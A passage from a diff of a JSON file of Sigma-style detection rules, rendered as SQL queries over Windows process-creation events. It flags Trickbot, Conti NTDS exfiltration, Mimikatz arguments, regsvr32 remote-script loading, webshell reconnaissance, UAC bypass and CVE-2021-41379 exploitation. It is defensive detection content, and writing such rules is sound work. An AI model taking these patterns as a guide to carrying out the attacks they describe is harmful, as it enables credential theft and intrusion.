"proc_creation_win_schtasks_one_time_only_midnight_task.yml" }, { - "title": "Griffon Malware Attack Pattern", - "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", - "status": "experimental", - "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Trickbot Malware Activity", + "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "status": "stable", + "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1559" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_griffon_patterns.yml" + "filename": "proc_creation_win_malware_trickbot_wermgr.yml" }, { - "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", - "id": "0d5675be-bc88-4172-86d3-1e96a4476536", - "status": "experimental", - "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "title": "Suspicious JavaScript Execution Via Mshta.EXE", + "id": "67f113fa-e23d-4271-befa-30113b3e08b1", + "status": "test", + "description": "Detects execution of javascript code 
using \"mshta.exe\".", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ "attack.defense_evasion", - "attack.lateral_movement", - "attack.t1021.001", - "attack.t1112" + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" + "filename": "proc_creation_win_mshta_javascript.yml" }, { - "title": "Suspicious Parent of Csc.exe", - "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", + "title": "HackTool - RedMimicry Winnti Playbook Execution", + "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", "status": "test", - "description": "Detects a suspicious parent of 
csc.exe, which could by a sign of payload delivery", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", + "author": "Alexander Rausch", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007", "attack.defense_evasion", - "attack.t1218.005", - "attack.t1027.004" + "attack.t1106", + "attack.t1059.003", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csc_susp_parent.yml" + "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" }, { - "title": "HackTool - CreateMiniDump Execution", - "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "title": "Conti NTDS Exfiltration Command", + "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", "status": "test", - "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a command used by conti to exfiltrate NTDS", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.collection", + "attack.t1560" ], "falsepositives": [ "Unknown" ], 
"level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_createminidump.yml" + "filename": "proc_creation_win_malware_conti_7zip.yml" }, { - "title": "Suspicious GrpConv Execution", - "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", - "status": "experimental", - "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", - "author": "Florian Roth (Nextron Systems)", + "title": "Tor Client/Browser Execution", + "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "status": "test", + "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\tor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_grpconv.yml" + "filename": "proc_creation_win_browsers_tor_execution.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile", - "id": "4cbef972-f347-4170-b62a-8253f6168e6d", - "status": "experimental", - "description": "Detects the 
\"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Possible Shim Database Persistence via sdbinst.exe", + "id": "517490a7-115a-48c6-8862-1a481504d5a8", + "status": "test", + "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", + "author": "Markus Neis", "tags": [ - "attack.execution", - "attack.defense_evasion", + "attack.persistence", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1546.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" + "filename": "proc_creation_win_sdbinst_shim_persistence.yml" }, { - "title": "Webshell Detection With Command Line Keywords", - "id": "bed2a484-9348-4143-8a8a-b801c979301c", + "title": "Suspicious Mshta.EXE Execution Patterns", + "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", "status": "experimental", - "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", + "description": "Detects suspicious mshta process execution patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + 
"attack.execution", + "attack.t1106" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\quser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR 
OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_webshell_detection.yml" - }, - { - "title": "HackTool - GMER Rootkit Detector and Remover Execution", - "id": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", - "status": "experimental", - "description": "Detects the execution GMER tool based on image and hash fields.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gmer.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=E9DC058440D321AA17D0600B3CA0AB04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173%' ESCAPE '\\') OR md5 = 'e9dc058440d321aa17d0600b3ca0ab04' OR sha1 = '539c228b6b332f5aa523e5ce358c16647d8bbe57' OR sha256 = 'e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' 
ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_hktl_gmer.yml" + "filename": "proc_creation_win_mshta_susp_pattern.yml" }, { - "title": "PowerShell Base64 Encoded WMI Classes", - "id": "1816994b-42e1-4fb1-afd2-134d88184f71", + "title": "Regsvr32 Anomaly", + "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", "status": "experimental", - "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"\"...etc.", - "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects various anomalies in relation to regsvr32.exe", + "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + "attack.t1218.010", + "car.2019-04-002", + "car.2019-04-003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE 
'%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' 
ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program 
Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" + "filename": "proc_creation_win_regsvr32_anomalies.yml" }, { - "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", - "id": "37db85d1-b089-490a-a59a-c7b6f984f480", + "title": "Potential CVE-2021-41379 Exploitation Attempt", + "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", "status": "test", - "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", - "author": "frack113", + "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1518.001" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentProcessName LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" ], - "filename": 
"proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" + "filename": "proc_creation_win_exploit_cve_2021_41379.yml" }, { - "title": "Potential Recon Activity Via Nltest.EXE", - "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", + "title": "Script Event Consumer Spawning Process", + "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", "status": "experimental", - "description": "Detects nltest commands that can be used for information discovery", - "author": "Craig Young, oscd.community, Georg Lauenstein", + "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", + "author": "Sittikorn S", "tags": [ - "attack.discovery", - "attack.t1016", - "attack.t1482" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Legitimate administration use but user and host must be investigated" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE 
'\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_nltest_recon.yml" + "filename": "proc_creation_win_scrcons_susp_child_process.yml" }, { - "title": "HackTool - Mimikatz Execution", - "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", + "title": "HackTool - Empire PowerShell Launch Parameters", + "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", "status": "test", - "description": "Detection well-known mimikatz command line arguments", - "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", + "description": "Detects suspicious powershell command line parameters used in Empire", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Other tools that incidentally use the same command line parameters" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE 
